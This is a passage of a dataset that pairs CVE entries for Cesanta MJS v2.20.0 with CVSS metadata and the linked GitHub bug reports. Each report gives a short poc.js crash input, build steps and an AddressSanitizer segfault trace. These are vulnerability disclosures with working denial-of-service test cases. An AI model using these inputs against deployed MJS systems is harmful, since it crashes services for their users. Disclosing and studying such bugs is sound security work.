0x5619439c70b3 in str_to_ulong src/mjs_string.c:242 #3 0x5619438ff7bb in mjs_array_length src/mjs_array.c:83 #4 0x5619438ff7bb in mjs_array_push src/mjs_array.c:115 #5 0x5619438ff7bb in mjs_array_push_internal src/mjs_array.c:131 #6 0x561943924244 in mjs_execute src/mjs_exec.c:853 #7 0x56194392da05 in mjs_exec_internal src/mjs_exec.c:1073 #8 0x56194392da05 in mjs_exec_file src/mjs_exec.c:1096 #9 0x5619438ea909 in main src/mjs_main.c:47 #10 0x7fb209249b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5619438eb449 in _start (/usr/local/bin/Gmjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x45a1f) ==126169==ABORTING ``` Credits: Found by OWL337 team.
SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x45a1f)
https://api.github.com/repos/cesanta/mjs/issues/217/comments
0
2021-12-31T07:57:19Z
2022-01-12T02:21:26Z
https://github.com/cesanta/mjs/issues/217
1,091,463,932
217
CVE-2021-46540
2022-01-27T21:15:10.730
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_get_mjs at src/mjs_builtin.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/214" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/214
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript print--(+""); print(+"\n\n"); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==35620==ERROR: AddressSanitizer: SEGV on unknown address 0x55a10287477c (pc 0x55a1028747ef bp 0x000000000034 sp 0x7ffdf2572288 T0) ==35620==The signal is caused by a WRITE memory access. #0 0x55a1028747ee in mjs_get_mjs src/mjs_builtin.c:105 #1 0x55a10288f244 in mjs_execute src/mjs_exec.c:853 #2 0x55a102898a05 in mjs_exec_internal src/mjs_exec.c:1073 #3 0x55a102898a05 in mjs_exec_file src/mjs_exec.c:1096 #4 0x55a102855909 in main src/mjs_main.c:47 #5 0x7fba02de9b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x55a102856449 in _start (/usr/local/bin/mjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_builtin.c:105 in mjs_get_mjs ==35620==ABORTING ```
SEGV src/mjs_builtin.c:105 in mjs_get_mjs
https://api.github.com/repos/cesanta/mjs/issues/214/comments
0
2021-12-31T07:53:19Z
2021-12-31T07:53:19Z
https://github.com/cesanta/mjs/issues/214
1,091,462,899
214
CVE-2021-46541
2022-01-27T21:15:10.773
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0x2c6ae. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/222" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/222
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest(b) { (gc(typeof (gc(typeof this)==="undefined"))==="undefined"); if (b < '#"$$abcdabcd"'.indexOf(gc --(typeof (gc(typeof this)==="undefined"))==="undefined")) JSEtest(b+'#1"$$abcdabcd"'.indexOf("$$abcdabcd")); } JSEtest(0); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==95067==ERROR: AddressSanitizer: SEGV on unknown address 0x55cbea3db63c (pc 0x55cbea3db6af bp 0x0000000000b5 sp 0x7ffc46f4e118 T0) ==95067==The signal is caused by a WRITE memory access. #0 0x55cbea3db6ae (/usr/local/bin/mjs+0x2c6ae) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0x2c6ae) ==95067==ABORTING ```
SEGV (/usr/local/bin/mjs+0x2c6ae)
https://api.github.com/repos/cesanta/mjs/issues/222/comments
0
2021-12-31T08:03:15Z
2021-12-31T08:03:15Z
https://github.com/cesanta/mjs/issues/222
1,091,465,836
222
CVE-2021-46542
2022-01-27T21:15:10.817
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_print at src/mjs_builtin.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/215" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/215
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case ```javascript function D(i) { print++i return [i]; } function A() { return D.apply(print(chr(D.apply(print(chr(0)), [i, 1, 2, 3]))), [i, 1, 2, 3]); } function JSEtest(i) { return A(i, 1, 2, 3); } JSEtest(89)[0] JSEtest(0.2) ``` ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js \x00 null ASAN:DEADLYSIGNAL ================================================================= ==55629==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55789394d7f2 bp 0x000000000095 sp 0x7ffdc33bd878 T0) ==55629==The signal is caused by a READ memory access. ==55629==Hint: address points to the zero page. #0 0x55789394d7f1 in mjs_print src/mjs_builtin.c:18 #1 0x557893968244 in mjs_execute src/mjs_exec.c:853 #2 0x557893971a05 in mjs_exec_internal src/mjs_exec.c:1073 #3 0x557893971a05 in mjs_exec_file src/mjs_exec.c:1096 #4 0x55789392e909 in main src/mjs_main.c:47 #5 0x7f7c0e673b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x55789392f449 in _start (/usr/local/bin/mjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_builtin.c:18 in mjs_print ==55629==ABORTING ``` Credits: Found by OWL337 team.
SEGV src/mjs_builtin.c:18 in mjs_print
https://api.github.com/repos/cesanta/mjs/issues/215/comments
0
2021-12-31T07:54:36Z
2022-01-12T02:21:03Z
https://github.com/cesanta/mjs/issues/215
1,091,463,219
215
CVE-2021-46543
2022-01-27T21:15:10.860
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /lib/x86_64-linux-gnu/libc.so.6+0x18e810. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/219" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/219
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript load('[\u\r \ntrue\t\r \n,\t\r \nnull\t\r \n,123.456\t\r \n]' + '[\t\r \ntrue\t\r \n,\t\r \nnull\t\r \n,123.456\t\r \n]' + '\t\r \n}\t\r \n'); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==28077==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f9ece3d7811 bp 0x7ffc033dfbb0 sp 0x7ffc033df328 T0) ==28077==The signal is caused by a READ memory access. ==28077==Hint: address points to the zero page. #0 0x7f9ece3d7810 (/lib/x86_64-linux-gnu/libc.so.6+0x18e810) #1 0x7f9ece88ee55 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x50e55) #2 0x557908c817a0 in cs_read_file src/common/cs_file.c:34 #3 0x557908bb6043 in mjs_exec_file src/mjs_exec.c:1087 #4 0x557908b93bf6 in mjs_load src/mjs_builtin.c:69 #5 0x557908bad244 in mjs_execute src/mjs_exec.c:853 #6 0x557908bb6a05 in mjs_exec_internal src/mjs_exec.c:1073 #7 0x557908bb6a05 in mjs_exec_file src/mjs_exec.c:1096 #8 0x557908b73909 in main src/mjs_main.c:47 #9 0x7f9ece26ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x557908b74449 in _start (/usr/local/bin/mjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x18e810) ==28077==ABORTING ``` Credits: Found by OWL337 team.
SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x18e810)
https://api.github.com/repos/cesanta/mjs/issues/219/comments
0
2021-12-31T07:59:21Z
2022-01-12T02:21:48Z
https://github.com/cesanta/mjs/issues/219
1,091,464,458
219
CVE-2021-46544
2022-01-27T21:15:10.903
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x59e19. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/220" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/220
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript let a = []; for (let k = 0; k < 5; ++k) { a[gc(gc(JSON.stringify(gc('#1.1: -0 - -0 === 0. Actual: '))))](0, a[k]()); } ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==30781==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f716475ce1a bp 0x7ffee0cc88e0 sp 0x7ffee0cc8040 T0) ==30781==The signal is caused by a READ memory access. ==30781==Hint: address points to the zero page. #0 0x7f716475ce19 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x59e19) #1 0x55af535c987a in getprop_builtin_array src/mjs_exec.c:476 #2 0x55af535c987a in getprop_builtin src/mjs_exec.c:536 #3 0x55af535c987a in mjs_execute src/mjs_exec.c:690 #4 0x55af535d2a05 in mjs_exec_internal src/mjs_exec.c:1073 #5 0x55af535d2a05 in mjs_exec_file src/mjs_exec.c:1096 #6 0x55af5358f909 in main src/mjs_main.c:47 #7 0x7f716412fb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55af53590449 in _start (/usr/local/bin/mjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x59e19) ==30781==ABORTING ``` Credits: Found by OWL337 team.
SEGV (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x59e19)
https://api.github.com/repos/cesanta/mjs/issues/220/comments
0
2021-12-31T08:00:38Z
2022-01-12T02:22:12Z
https://github.com/cesanta/mjs/issues/220
1,091,464,835
220
CVE-2021-46545
2022-01-27T21:15:10.947
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /lib/x86_64-linux-gnu/libc.so.6+0x4b44b. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/218" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/218
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function getImmutableArrayOrSet(get, value) { ({ e: "[object " + "Array", e: JSON.stringify({ e: 1, f: 2 }) }) } function JSEtest() { getImmutableArrayOrSet(true); for (let i = 0; i < 2; ([ JSON.parse( '192.015052000001' ), ])) { getImmutableArrayOrSet(false, {}); } let arr = getImmutableArrayOrSet(true); } JSEtest(); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==62116==ERROR: AddressSanitizer: SEGV on unknown address 0x602000010000 (pc 0x7f9a89e6444c bp 0x60200000fff0 sp 0x7fff400ffd90 T0) ==62116==The signal is caused by a READ memory access. #0 0x7f9a89e6444b (/lib/x86_64-linux-gnu/libc.so.6+0x4b44b) #1 0x55ca33043e4a in frozen_cb src/mjs_json.c:360 #2 0x55ca33122876 in json_parse_number src/frozen/frozen.c:288 #3 0x55ca33122876 in json_parse_value src/frozen/frozen.c:374 #4 0x55ca33134337 in json_doit src/frozen/frozen.c:434 #5 0x55ca33134337 in json_walk src/frozen/frozen.c:815 #6 0x55ca33050873 in mjs_json_parse src/mjs_json.c:450 #7 0x55ca33056722 in mjs_op_json_parse src/mjs_json.c:510 #8 0x55ca33010244 in mjs_execute src/mjs_exec.c:853 #9 0x55ca33019a05 in mjs_exec_internal src/mjs_exec.c:1073 #10 0x55ca33019a05 in mjs_exec_file src/mjs_exec.c:1096 #11 0x55ca32fd6909 in main src/mjs_main.c:47 #12 0x7f9a89e3ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #13 0x55ca32fd7449 in _start (/usr/local/bin/mjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x4b44b) ==62116==ABORTING ``` Credits: Found by OWL337 team.
SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x4b44b)
https://api.github.com/repos/cesanta/mjs/issues/218/comments
0
2021-12-31T07:58:22Z
2022-01-12T02:21:37Z
https://github.com/cesanta/mjs/issues/218
1,091,464,190
218
CVE-2021-46546
2022-01-27T21:15:10.990
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_next at src/mjs_object.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/213" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/213
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript for (let y in { aa: 1, ba: 2, ca: 3 }) { Object.create.apply({}, [Object] 1) } ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==35880==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x560c3e80fde0 bp 0xfffc60e0000000a8 sp 0x7ffdb0ad02e0 T0) ==35880==The signal is caused by a READ memory access. ==35880==Hint: address points to the zero page. #0 0x560c3e80fddf in mjs_next src/mjs_object.c:255 #1 0x560c3e7bafed in mjs_execute src/mjs_exec.c:760 #2 0x560c3e7c6a05 in mjs_exec_internal src/mjs_exec.c:1073 #3 0x560c3e7c6a05 in mjs_exec_file src/mjs_exec.c:1096 #4 0x560c3e783909 in main src/mjs_main.c:47 #5 0x7fd9390adb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x560c3e784449 in _start (/usr/local/bin/mjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_object.c:255 in mjs_next ==35880==ABORTING ```
SEGV src/mjs_object.c:255 in mjs_next
https://api.github.com/repos/cesanta/mjs/issues/213/comments
0
2021-12-31T07:50:54Z
2021-12-31T07:50:54Z
https://github.com/cesanta/mjs/issues/213
1,091,462,280
213
CVE-2021-46547
2022-01-27T21:15:11.033
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0x2c17e. This vulnerability can lead to a Denial of Service (DoS).
